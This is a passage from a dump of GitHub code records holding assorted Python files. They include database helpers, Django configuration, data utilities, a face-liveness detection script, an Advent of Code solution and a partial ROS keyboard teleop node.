print(mean_fits(path,'mean_dark'))\r\n","repo_name":"DivyanshuTak/chromospheric_photospheric_image_corelation","sub_path":"mean_fits.py","file_name":"mean_fits.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26797175911","text":"'''\nCreated on 9 Dec 2013\n'''\n\nfrom pymongo import MongoClient\n\nclass MongoDb(object):\n '''\n classdocs\n '''\n def __init__(self, host, port):\n self.client = MongoClient(host, port)\n \n def pushData(self, titlesDict, seriesName, seasonNumber):\n db = self.client[seriesName]\n self.saveToDatabase(db['Season' + str(seasonNumber)], titlesDict)\n\n def saveToDatabase(self, collection, titlesDict):\n for episode in titlesDict.keys():\n existingDocument = collection.find_one(episode)\n if not existingDocument:\n data = {'_id': episode,\n 'title': titlesDict.get(episode)}\n \n collection.insert(data) \n \n def pushSeries(self, seriesName, seasonNumber, wikiPath, seasonAnchor):\n db = self.client['series-list']\n collection = db[seriesName]\n \n data = {'_id': seasonNumber, \n 'wikiPath': wikiPath,\n 'seasonAnchor': seasonAnchor\n }\n \n collection.insert(data) \n \n def getSeries(self, seriesName, seasonNumber): \n db = self.client['series-list']\n return db[seriesName].find_one({'_id': str(seasonNumber)})\n ","repo_name":"luca-mandrioli/SeriesParser","sub_path":"com/mandrocker/series/db/MongoDb.py","file_name":"MongoDb.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2841943127","text":"def sort(array):\n minOutofOrder = float(\"inf\")\n maxOutOrder = float(\"-inf\")\n for i in range(len(array)):\n num = array[i]\n if isOutofOrder(i, num, array):\n minOutofOrder = min(minOutofOrder, num)\n maxOutOrder = max(maxOutOrder, num)\n if minOutofOrder == float(\"inf\"):\n return [-1, 1]\n leftIndex = 0\n while minOutofOrder >= array[leftIndex]:\n leftIndex += 1\n rightIndex = len(array) - 1\n while maxOutOrder <= array[rightIndex]:\n rightIndex -= 1\n return [leftIndex, rightIndex]\n\n\ndef isOutofOrder(i, num, array):\n if i == 0:\n return num > array[i + 1]\n if i == len(array) - 1:\n return num < array[i - 1]\n return num > array[i+ 1] or num < array[i- 1]\n","repo_name":"onkarj-98/Data_structures_and_Algorithms","sub_path":"Array/subArraySort.py","file_name":"subArraySort.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"43974956396","text":"import csv\nimport os\nimport re\n\n\ndef create_csv() -> None:\n f0 = \"datasets/\"\n fold0 = os.listdir(f0)\n\n with open(\"patient.csv\", \"w\") as pat:\n pat_writer = csv.writer(pat, delimiter=\",\", quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n pat_writer.writerow([\"name_file\", \"name_folder\", \"fna\", \"tirad\"])\n\n for root, dirs, files in os.walk(f0, topdown=True):\n if \".exports\" in root:\n continue\n if \"tirad\" in root.lower():\n regex = re.search(r\"[T|t]irads.*(\\d{1}\\w{0,1}).+\", root)\n if regex == None:\n print(root)\n if \"IVa\" in root:\n tirad = \"4a\"\n else:\n tirad = regex.group(1)\n # print(tirad)\n\n if \"lanh\" in root or \"lành\" in root:\n fna = 0\n elif \"ac\" in root:\n fna = 1\n else:\n fna = 2\n\n for file_name in files:\n a = [file_name, root, fna, tirad]\n print(a)\n pat_writer.writerow(a)\n\n\n__all_ = 
[\"create_csv\"]\n","repo_name":"blueyellowpink/thyroid","sub_path":"utils/create_csv.py","file_name":"create_csv.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6731384466","text":"import os\nfrom waflib.Task import Task\nfrom waflib.TaskGen import feature, before_method, after_method\n\nFEATURE = 'flexnet_trial'\n\ndef configure(conf):\n\tj = os.path.join\n\n\tconf.find_program('java')\n\n\tflexnet_dir = j(conf.get_third_party(), 'flexnet_client-2016.08')\n\tidentity = j(flexnet_dir, 'IdentityBackOffice.bin')\n\ttools = j(flexnet_dir, 'tools')\n\tclass_path = [\n\t\tj(tools, 'flxTools.jar'),\n\t\tj(tools, 'flxBinary.jar'),\n\t\tj(tools, 'EccpressoAll.jar'),\n\t\tj(tools, 'commons-codec-1.9.jar'),\n\t]\n\n\tconf.env['FLEXNET_TRIAL_OPTS'] = [\n\t\t'-cp', os.pathsep.join(class_path),\n\t\t'com.flexnet.lm.tools.TrialFileUtil',\n\t\t'-id', identity\n\t]\n\n\tconf.env.append_value('supported_features', FEATURE)\n\n@feature(FEATURE)\n@before_method('process_source')\ndef generate_flexnet_trial(self):\n\tsrc = getattr(self, 'flexnet_input', None)\n\tif not src:\n\t\tself.generator.bld.fatal('flexnet_input must be specified')\n\n\tproduct = getattr(self, 'flexnet_product', None)\n\tif not product:\n\t\tself.generator.bld.fatal('flexnet_product must be specified')\n\tself.env['FLEXNET_PRODUCT'] = product\n\n\tinst_to = getattr(self, 'install_path', '${BINDIR}')\n\tnode = self.path.find_resource(src)\n\ttgt = getattr(self, 'flexnet_output', None)\n\tif tgt is None:\n\t\ttask = self.create_task('flexnet_trial', node, node.change_ext('.bin'))\n\t\tself.install_files(inst_to, task.outputs)\n\telse:\n\t\ttask = self.create_task('flexnet_trial', node, tgt)\n\t\tif not tgt.is_src():\n\t\t\tself.install_files(inst_to, tgt)\n\nclass flexnet_trial(Task):\n\trun_str = '${JAVA} ${FLEXNET_TRIAL_OPTS} -product {FLEXNET_PRODUCT} ${SRC} ${TGT}'\n\tvars = [ 'FLEXNET_TRIAL_OPTS', 'FLEXNET_PRODUCT' ]\n","repo_name":"sfncat/peach","sub_path":"pfce/pfce_src/build/tools/flexnet.py","file_name":"flexnet.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"33985767827","text":"from django.urls import path, re_path, include\n\n# from . import views\nfrom . 
import views\n\nurlpatterns = [\n # path('list/', views.user_list_view),\n # path('item/', views.UserListItem.as_view()),\n path('login/', views.LoginView.as_view()),\n path('signup/', views.Signup.as_view()),\n path('list/', views.AllUsers.as_view()),\n path('edit/', views.ProfileEdit.as_view()),\n\n # path('', include('django.contrib.auth.urls')), # new\n]","repo_name":"mahtaakhyani/Django","sub_path":"user/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5561436286","text":"#\n# FAKE-COIN problem model (alternative) for COBRA\n#\n\nN = 12\nsrange = lambda s, n: [s + str(i) for i in range(1, n+1)]\n\nVARIABLES(srange(\"y\", N) + srange(\"x\", N))\nCONSTRAINT(\"Exactly-1(%s, %s)\" % (\",\".join(srange(\"x\", N)), \",\".join(srange(\"y\", N))))\n\nALPHABET(srange(\"\", N))\nMAPPING(\"X\", [\"x\"+str(i) for i in range(1, N + 1)])\nMAPPING(\"Y\", [\"y\"+str(i) for i in range(1, N + 1)])\n\n# Helper function for generating strings representing list\n# For example, params(\"X\", 2, 5) = \"X$2, X$3, X$4, X$5\"\nparams = lambda s, n0, n1: \",\".join(s + \"$\" + str(i) for i in range(n0, n1+1))\n\nfor m in range(1, N//2 + 1):\n # weighting m coins agains m coins\n EXPERIMENT(\"weighing\" + str(m), 2*m)\n PARAMS_DISTINCT(range(1, 2*m + 1))\n PARAMS_SORTED(range(1, m + 1))\n PARAMS_SORTED(range(m+1, 2*m + 1))\n PARAMS_SORTED([1, m + 1])\n\n # left side is lighter\n OUTCOME(\"lighter\", \"Or(%s) | Or(%s)\" % (params(\"X\", 1, m), params(\"Y\", m+1, 2*m)))\n OUTCOME(\"heavier\",\"Or(%s) | Or(%s)\" % (params(\"Y\", 1, m), params(\"X\", m+1, 2*m)))\n\n # both sides weight the same\n OUTCOME(\"same\",\"!Or(%s,%s)\" % (params(\"X\", 1, 2*m), params(\"Y\", 1, 2*m)))","repo_name":"mirek26/cobra","sub_path":"cobra/examples/counterfeit-coin-24.py","file_name":"counterfeit-coin-24.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"12458071667","text":"from __future__ import absolute_import\nfrom __future__ import print_function\n\nimport os\nimport io\nimport sys\nimport unittest\nfrom io import open\n\nimport mock\n\nfrom scalyr_agent.test_base import skipIf\n\nBASE_DIR = os.path.abspath(os.path.dirname(os.path.abspath(__file__)))\n\nMODULE_PATH = os.path.abspath(\n os.path.join(BASE_DIR, \"../../../scalyr_agent/third_party/tcollector/collectors/0\")\n)\nFIXTURES_DIR = os.path.abspath(os.path.join(BASE_DIR, \"../fixtures/netstat\"))\nsys.path.append(MODULE_PATH)\n\n# pylint: disable=import-error\n# type: ignore\nif sys.platform.startswith(\"win\"):\n parse_and_print_metrics = None\nelse:\n from netstat import parse_and_print_metrics\n\n\nclass NetStatTcollectorTestCase(unittest.TestCase):\n @skipIf(\n not parse_and_print_metrics, \"Skipping Linux only test on unsupported platform\"\n )\n @mock.patch(\"netstat.time.time\", mock.Mock(return_value=100))\n def test_verify_proc_netstat_kernel_5_11(self):\n file_path_netstat = os.path.join(\n FIXTURES_DIR, \"netstat_ubuntu_20_04_kernel_5.11.0.txt\"\n )\n file_path_sockstat = os.path.join(\n FIXTURES_DIR, \"sockstat_ubuntu_20_04_kernel_5.11.0.txt\"\n )\n\n output_file_sucess = io.StringIO()\n output_file_error = io.StringIO()\n\n with open(file_path_netstat, \"r\") as f_netstat, open(\n file_path_sockstat, \"r\"\n ) as f_sockstat:\n parse_and_print_metrics(\n f_netstat, f_sockstat, output_file_sucess, output_file_error\n )\n\n 
output_success = output_file_sucess.getvalue()\n output_error = output_file_error.getvalue()\n output_success_lines = output_success.strip().split(\"\\n\")\n\n self.assertEqual(output_error, \"\")\n self.assertEqual(\n output_success_lines[0], \"net.sockstat.num_sockets 100 4 type=tcp\"\n )\n self.assertEqual(\n output_success_lines[-1], \"net.stat.tcp.receive.queue.full 100 0\"\n )\n self.assertEqual(len(output_success_lines), 40)\n","repo_name":"scalyr/scalyr-agent-2","sub_path":"tests/unit/builtin_monitors/netstat_tcollector_test.py","file_name":"netstat_tcollector_test.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":68,"dataset":"github-code","pt":"48"} +{"seq_id":"16000672612","text":"from collections import defaultdict\nimport torch\nimport numpy as np\nimport scipy.sparse as sp\n\n\ndef convert_sp_mat_to_sp_tensor(X):\n \"\"\"Convert raw sp matrix into sparse tensor\"\"\"\n coo = X.tocoo().astype(np.float32)\n row = torch.Tensor(coo.row).long()\n col = torch.Tensor(coo.col).long()\n index = torch.stack([row, col])\n data = torch.FloatTensor(coo.data)\n return torch.sparse.FloatTensor(index, data, torch.Size(coo.shape))\n\n\ndef compute_normalize_adj(adj):\n row_sum = np.array(adj.sum(1))\n d_inv = np.power(row_sum, -0.5).flatten()\n d_inv[np.isinf(d_inv)] = 0.\n d_mat_inv = sp.diags(d_inv)\n norm_adj = d_mat_inv.dot(adj).dot(d_mat_inv)\n return norm_adj\n\n\ndef load_file_to_dict_format(filename):\n \"\"\"Convert data into Dict format\"\"\"\n contents = open(filename, 'r').readlines()\n ui_test_dict = defaultdict(list)\n for content in contents:\n content = content.split()\n u, items = int(content[0]), [int(i) for i in content[1:]]\n ui_test_dict[u] = items\n return ui_test_dict\n\n\ndef load_file_to_list_format(filename):\n \"\"\"Convert data into two List(s) format\"\"\"\n contents = open(filename, 'r').readlines()\n train_u, train_i = [], []\n for content in contents:\n content = content.split()\n u = int(content[0])\n train_u.extend([u] * len(content[1:]))\n for i in content[1:]:\n train_i.append(int(i))\n\n return train_u, train_i\n\n\ndef compute_hyper_graph_adj(h):\n \"\"\"Based on Hyper-graph matrix H, compute final normalized adjacency matrix\"\"\"\n dv = np.array(h.sum(1))\n d_inv = np.power(dv, -0.5).flatten()\n d_inv[np.isinf(d_inv)] = 0.\n dv = sp.diags(d_inv)\n\n de = np.array(h.sum(0))\n d_ine = np.power(de, -1).flatten()\n d_ine[np.isinf(d_ine)] = 0.\n de = sp.diags(d_ine)\n\n # D_v^{-\\frac{1}{2}} H D_e^{-1} H^T D_v^{-\\frac{1}{2}}\n return dv.dot(h).dot(de).dot(h.T).dot(dv)\n\n\ndef construct_group_graph(gu_dict, gi_dict, num_groups):\n matrix = np.zeros((num_groups, num_groups))\n\n for g in range(num_groups):\n g1_member = set(gu_dict.get(g, []))\n g1_item = set(gi_dict.get(g, []))\n\n for g2 in range(g + 1, num_groups):\n g2_member = set(gu_dict.get(g2, []))\n g2_item = set(gi_dict.get(g2, []))\n\n member_overlap = g1_member & g2_member\n member_union = g1_member | g2_member\n\n item_overlap = g1_item & g2_item\n item_union = g1_item | g2_item\n\n if (len(member_union) + len(item_union)) == 0:\n matrix[g][g2] = matrix[g2][g] = 0.0\n continue\n\n matrix[g][g2] = float((len(member_overlap) + len(item_overlap)) / (len(member_union) + len(item_union)))\n matrix[g2][g] = matrix[g][g2]\n\n matrix = matrix + np.diag([1.0] * num_groups)\n degree = np.sum(np.array(matrix), 1)\n return np.dot(np.diag(1.0 / degree), 
matrix)\n","repo_name":"WxxShirley/CIKM2023DiRec","sub_path":"baselines/GRModels/ConsRec/datautil.py","file_name":"datautil.py","file_ext":"py","file_size_in_byte":2913,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"5228236739","text":"#!/usr/bin/env python\n\n# Advent of Code 2020\n# https://adventofcode.com/2020/day/11\n\nimport sys\nimport copy\n\nFLOOR = \".\"\nOCCUPIED = \"#\"\nEMPTY = \"L\"\n\ndirections = (\n (-1, -1), (-1, 0), (-1, 1),\n (0, -1), (0, 1),\n (1, -1), (1, 0), (1, 1)\n)\n\n\ndef count_occupied_around(layout, i, j):\n occupied, height, width = 0, len(layout), len(layout[0])\n for row_move, col_move in directions:\n a, b = i + row_move, j + col_move\n if 0 <= a < height and 0 <= b < width:\n occupied += layout[a][b] == OCCUPIED\n return occupied\n\n\ndef count_visible_occupied(layout, i, j):\n occupied, height, width = 0, len(layout), len(layout[0])\n for row_move, col_move in directions:\n a, b = i + row_move, j + col_move\n while 0 <= a < height and 0 <= b < width:\n state = layout[a][b]\n if state != FLOOR:\n occupied += state == OCCUPIED\n break\n else:\n a, b = a + row_move, b + col_move\n return occupied\n\n\ndef apply_rules(layout, i, j, occupied_threshold, seat_count_f):\n pre = layout[i][j]\n\n if pre == FLOOR:\n return pre\n\n occupied_count = seat_count_f(layout, i, j)\n\n if pre == OCCUPIED and occupied_count >= occupied_threshold:\n return EMPTY\n\n if pre == EMPTY and occupied_count == 0:\n return OCCUPIED\n\n return pre\n\n\ndef round(layout, occupied_threshold, seat_count_f):\n changed, height, width = False, len(layout), len(layout[0])\n new_layout = copy.deepcopy(layout)\n for row in range(height):\n for col in range(width):\n new_layout[row][col] = apply_rules(layout, row, col, occupied_threshold, seat_count_f)\n changed = changed or (layout[row][col] != new_layout[row][col])\n return (changed, new_layout)\n\n\ndef change_until_stable(layout, occupied_threshold, seat_count_f):\n while True:\n changed, new_layout = round(layout, occupied_threshold, seat_count_f)\n if not changed:\n break\n layout = new_layout\n return layout\n\n\ndef read_seat_layout():\n return [[c for c in line.strip()] for line in sys.stdin.readlines() if line.strip()]\n\n\noriginal = read_seat_layout()\n\nlayout = change_until_stable(copy.deepcopy(original), 4, count_occupied_around)\noccupied = sum(sum(1 for seat in row if seat == OCCUPIED) for row in layout)\nprint(f'Part 1: #Seats occupied: {occupied}')\n\nlayout = change_until_stable(copy.deepcopy(original), 5, count_visible_occupied)\noccupied = sum(sum(1 for seat in row if seat == OCCUPIED) for row in layout)\nprint(f'Part 2: #Seats occupied: {occupied}')\n","repo_name":"danyluis/aoc","sub_path":"2020/11-seat-layout/11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"28537078755","text":"from django.contrib import admin\n\nfrom .models import Classe\n\n# Register your models here.\n\n# class ProfessorInline(admin.TabularInline):\n# \tmodel = Classe.professors.through\n\nclass ClasseModelAdmin(admin.ModelAdmin):\n\t\n\tlist_display = [\n\t\t'__str__',\n\t\t'nom',\n\t]\n\n\t# inlines = [\n\t# \tProfessorInline,\n\t# ]\n\n\t# search_fields = [\n\t# \t'curs',\n\t# ]\n\n\tclass Meta:\n\t\tmodel = Classe\n\t\tfields = [\n\t\t\t'id',\n\t\t\t'nom',\n\t\t\t'curs',\n\t\t\t'assignatures',\n\t\t\t'alumnes'\n\t\t]\n\nadmin.site.register(Classe, 
ClasseModelAdmin)","repo_name":"adriamoya/teach-app","sub_path":"backend/classes/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41283729748","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"Demo\")\n\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )\n#process.MessageLogger.cerr.FwkReport.reportEvery = 10\n\n#process.load('HeavyIonsAnalysis.Configuration.collisionEventSelection_cff')\nprocess.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')\nfrom Configuration.AlCa.GlobalTag_condDBv2 import GlobalTag\nprocess.GlobalTag = GlobalTag(process.GlobalTag, 'auto:run2_mc_hi', '')\n\nprocess.load(\"RecoHI.HiCentralityAlgos.CentralityBin_cfi\")\nprocess.centralityBin.Centrality = cms.InputTag(\"hiCentrality\")\nprocess.centralityBin.centralityVariable = cms.string(\"HFtowers\")\nprocess.centralityBin.nonDefaultGlauberModel = cms.string(\"HydjetDrum5\")\n\nprocess.GlobalTag.toGet.extend([\n cms.PSet(record = cms.string(\"HeavyIonRcd\"),\n tag = cms.string(\"CentralityTable_HFtowers200_HydjetDrum5_v750x02_mc\"),\n connect = cms.string(\"frontier://FrontierProd/CMS_CONDITIONS\"),\n label = cms.untracked.string(\"HFtowersHydjetDrum5\")\n ),\n])\n\nprocess.source = cms.Source(\"PoolSource\",\n fileNames = cms.untracked.vstring(),\n duplicateCheckMode = cms.untracked.string(\"noDuplicateCheck\")\n)\nimport FWCore.Utilities.FileUtils as FileUtils\nmylist = FileUtils.loadListFromFile ('filelistAll.txt')\nfor fname in mylist:\n process.source.fileNames.append('file:%s' % (fname))\n\n\nprocess.TFileService = cms.Service(\"TFileService\",\n fileName=cms.string(\"histogram_testMB_5020GeV.root\")\n)\n\nprocess.demo = cms.EDAnalyzer('TestAnalysis',\n CentralitySrc = cms.InputTag(\"hiCentrality\"),\n centralityBinLabel = cms.InputTag(\"centralityBin\",\"HFtowers\"),\n srcTracks = cms.InputTag(\"hiGeneralTracks\"),\n srcVertex= cms.InputTag(\"hiSelectedVertex\"),\n UseQuality = cms.bool(True),\n TrackQuality = cms.string('highPurity'),\n trackEtaCut = cms.double(2.4),\n trackPtCut = cms.double(0.3),\n# srcTracksPixel = cms.InputTag(\"hiGeneralAndPixelTracks\")\n srcTracksPixel = cms.InputTag(\"hiGeneralTracks\")\n)\n\n\nprocess.p = cms.Path(process.centralityBin * process.demo)\n","repo_name":"tuos/Centrality","sub_path":"ppRECO/produceIDTree_2/TestAnalysis/test/validateCent/cent0/ConfFile_cfg.py","file_name":"ConfFile_cfg.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5076891962","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Oct 6 18:49:58 2021\r\n\r\n@author: vnarayana\r\n\"\"\"\r\n\r\nfrom scipy.stats import truncnorm\r\nimport matplotlib.pyplot as plt\r\n\r\ndef get_truncated_normal(mean=1.7, sd=0.5, low=5, upp=20):\r\n return truncnorm(\r\n (low - mean) / sd, (upp - mean) / sd, loc=mean, scale=sd)\r\n\r\nX = get_truncated_normal(mean=8, sd=2, low=1, upp=10)\r\na = X.rvs(10)\r\n\r\n\r\nfig, ax = plt.subplots()\r\nax.hist(X.rvs(400), density=True,bins =10)\r\nplt.show()","repo_name":"vnarayana0907/PythonNanoparticle-Simulation","sub_path":"sd.py","file_name":"sd.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} 
+{"seq_id":"40758725221","text":"class Evaluation:\n def __init__(self, predictionRankLists, answerRankLists):\n self._predictionRankLists = predictionRankLists;\n self._answerRankLists = answerRankLists;\n\n def evaluateMeanAveragePrecision(self, topRankK):\n meanAveragePrecision = 0.0;\n\n for (q, predictionRankList) in enumerate(self._predictionRankLists):\n averagePrecision = 0.0;\n trueRelevanceCount = 0;\n\n for (r, documentID) in enumerate(predictionRankList):\n if r >= topRankK:\n break;\n if documentID in self._answerRankLists[q]:\n rank = r + 1;\n trueRelevanceCount += 1;\n averagePrecision += float(trueRelevanceCount) / rank;\n\n averagePrecision /= len(self._answerRankLists[q]);\n meanAveragePrecision += averagePrecision;\n print(\"\\t\\tAverage precision for the query %d: %f\" % (q, averagePrecision));\n\n meanAveragePrecision /= len(self._predictionRankLists);\n return meanAveragePrecision;\n","repo_name":"chinchi-hsu/SimpleRetrievalSystem","sub_path":"evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37369486482","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\nimport numpy as np \nimport keras\nfrom keras.models import model_from_json\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers import Conv3D, MaxPooling3D\nfrom keras import backend as K\n\n\ndef get_liveness_model():\n\n model = Sequential()\n model.add(Conv3D(32, kernel_size=(3, 3, 3),\n activation='relu',\n input_shape=(24,100,100,1)))\n model.add(Conv3D(64, (3, 3, 3), activation='relu'))\n model.add(MaxPooling3D(pool_size=(2, 2, 2)))\n model.add(Conv3D(64, (3, 3, 3), activation='relu'))\n model.add(MaxPooling3D(pool_size=(2, 2, 2)))\n model.add(Conv3D(64, (3, 3, 3), activation='relu'))\n model.add(MaxPooling3D(pool_size=(2, 2, 2)))\n model.add(Dropout(0.25))\n model.add(Flatten())\n model.add(Dense(128, activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(2, activation='softmax'))\n\n return model\n\n\n# In[3]:\n\n\nimport face_recognition\nimport cv2\nimport numpy as np \n#from livenessmodel import get_liveness_model\n#from common import get_users\nfont = cv2.FONT_HERSHEY_DUPLEX\n\n# Get the liveness network\nmodel = get_liveness_model()\n\n# load weights into new model\nmodel.load_weights(\"/Users/olive.chaudhuri/Downloads/model.h5\")\nprint(\"Loaded model from disk\")\n\n\n# In[4]:\n\n\nimport face_recognition\nfrom os import listdir\nfrom os.path import isfile, join\nfrom glob import glob\n\ndef get_users():\n\n known_names=[]\n known_encods=[]\n\n for i in glob(\"/Users/olive.chaudhuri/Downloads/people/*.jpg\"):\n img = face_recognition.load_image_file(i)\n encoding = face_recognition.face_encodings(img)[0]\n known_encods.append(encoding)\n known_names.append(i[7:-4])\n print(\"Loaded image from disk\")\n\n\n return known_names, known_encods\n\n\n# In[5]:\n\n\n# Read the users data and create face encodings \nknown_names, known_encods = get_users()\n\n\nvideo_capture = cv2.VideoCapture(0)\nvideo_capture.set(3, 640)\nvideo_capture.set(4, 480)\n\n# Initialize some variables\nface_locations = []\nface_encodings = []\nface_names = []\nprocess_this_frame = True\ninput_vid = []\n\n\n# In[6]:\n\n\nwhile True:\n # Grab a single frame of video\n if len(input_vid) < 24:\n\n ret, frame = video_capture.read()\n\n liveimg = cv2.resize(frame, (100,100))\n liveimg = cv2.cvtColor(liveimg, 
cv2.COLOR_BGR2GRAY)\n input_vid.append(liveimg)\n else:\n ret, frame = video_capture.read()\n\n liveimg = cv2.resize(frame, (100,100))\n liveimg = cv2.cvtColor(liveimg, cv2.COLOR_BGR2GRAY)\n input_vid.append(liveimg)\n inp = np.array([input_vid[-24:]])\n inp = inp/255\n inp = inp.reshape(1,24,100,100,1)\n pred = model.predict(inp)\n input_vid = input_vid[-25:]\n\n if pred[0][0]> .95:\n\n # Resize frame of video to 1/4 size for faster face recognition processing\n # performance testing needed -> on full frame !! (ask team)\n small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)\n\n # Only process every other frame of video to save time\n if process_this_frame:\n # Find all the faces and face encodings in the current frame of video\n face_locations = face_recognition.face_locations(small_frame)\n face_encodings = face_recognition.face_encodings(small_frame, face_locations)\n name = \"Unknown\"\n face_names = []\n for face_encoding in face_encodings:\n for ii in range(len(known_encods)):\n \n # known face match\n \n # Use FreeChargeDB to get list of users with faces\n match = face_recognition.compare_faces([known_encods[ii]], face_encoding)\n\n if match[0]:\n name = known_names[ii]\n\n face_names.append(name)\n\n process_this_frame = not process_this_frame\n\n #VALID FC USERS FASTER UNLOCK\n unlock = False\n for n in face_names:\n\n if n != 'Unknown':\n unlock=True\n\n #results\n for (top, right, bottom, left), name in zip(face_locations, face_names):\n \n # NOT SURE ABOUT SCALING TO 4x4 (ask team)\n top *= 4\n right *= 4\n bottom *= 4\n left *= 4\n\n # Face box\n cv2.rectangle(frame, (left, top), (right, bottom), (0, 127, 255), 2)\n\n # name box\n cv2.rectangle(frame, (left, bottom - 35), (right, bottom), (0, 0, 255), cv2.FILLED)\n \n cv2.putText(frame, name, (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)\n \n cv2.putText(frame, 'VALID!', (frame.shape[1]//2, frame.shape[0]//2), font, 1.0, (255, 255, 255), 1)\n else:\n cv2.putText(frame, 'SPOOF WARNING!', (frame.shape[1]//2, frame.shape[0]//2), font, 1.0, (255, 255, 255), 1)\n # Display the liveness score in top left corner \n cv2.putText(frame, str(pred[0][0]), (20, 20), font, 1.0, (255, 255, 0), 1)\n # Display the resulting image\n cv2.imshow('Video', frame)\n\n #quit \n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# Release handle to the webcam\nvideo_capture.release()\ncv2.destroyAllWindows()\n\n\n# In[7]:\n\n\nvideo_capture.release()\ncv2.destroyAllWindows()\n\n","repo_name":"olive268/hackathon","sub_path":"model/Better(1).py","file_name":"Better(1).py","file_ext":"py","file_size_in_byte":5577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6412065392","text":"\"\"\"last update ts\n\nRevision ID: 15b1d33fd8ac\nRevises: a20ebbb175f2\nCreate Date: 2021-12-14 21:32:55.885212\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '15b1d33fd8ac'\ndown_revision = 'a20ebbb175f2'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('user', sa.Column('updated_datetime', sa.DateTime(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_column('user', 'updated_datetime')\n # ### end Alembic commands ###\n","repo_name":"LuckyStarTF2/help.tf","sub_path":"migrations/versions/15b1d33fd8ac_last_update_ts.py","file_name":"15b1d33fd8ac_last_update_ts.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7663757442","text":"def findComplement(self, num: int) -> int:\n\n x = bin(num).replace('0b','')\n print(x)\n\n st = \"\"\n for i in x:\n if i == '1':\n st += '0'\n if i == '0':\n st += '1'\n\n return int(st,2)\n","repo_name":"Rahul140799/Placement-Kit","sub_path":"LeetCode/complement(bin_to_dec).py","file_name":"complement(bin_to_dec).py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16556160235","text":"#!/usr/bin/python\n\nimport rospy\nimport sys, select, termios, tty\nfrom std_msgs.msg import Float64MultiArray\n\nclass LECTURE_KEY: \n\n def __init__(self):\n self.order = Float64MultiArray()\n\n self.v_crucero = rospy.get_param(\"/vel_cruc\")\n self.w_max = rospy.get_param(\"/w_max\")\n self.f = rospy.get_param(\"/f\")\n\n self.key_timeout = rospy.get_param(\"~key_timeout\", 0.0)\n if self.key_timeout == 0.0:\n self.key_timeout = None\n\n self.nameTopicPub1 = \"/vel_order\"\n\n self.pub1 = rospy.Publisher(self.nameTopicPub1,Float64MultiArray,queue_size=10)\n \n rate = rospy.Rate(self.f)\n self.vel_y = 0\n self.w = 0\n self.quit = False\n self.key = ' '\n\n while (not rospy.is_shutdown()):\n if(~self.quit):\n self.detectar_key()\n else:\n break\n \n rate.sleep()\n \n def detectar_key(self):\n \n self.key = getKey(self,self.key_timeout)\n \n if self.key in moveBindings.keys():\n if ((self.key == 'q') | (self.key == 'Q')):\n self.quit = True\n elif (self.key == ' '):\n self.vel_y = moveBindings[self.key][0]\n self.w = moveBindings[self.key][1]\n else:\n self.vel_y = self.vel_y + moveBindings[self.key][0]\n self.w = self.w + moveBindings[self.key][1]\n \n if (self.vel_y >= self.v_crucero):\n self.vel_y = self.v_crucero\n elif (self.vel_y <= -self.v_crucero):\n self.vel_y = -self.v_crucero\n \n if (self.w >= self.w_max):\n self.w = self.w_max\n elif (self.w <= -self.w_max):\n self.w = -self.w_max\n\n 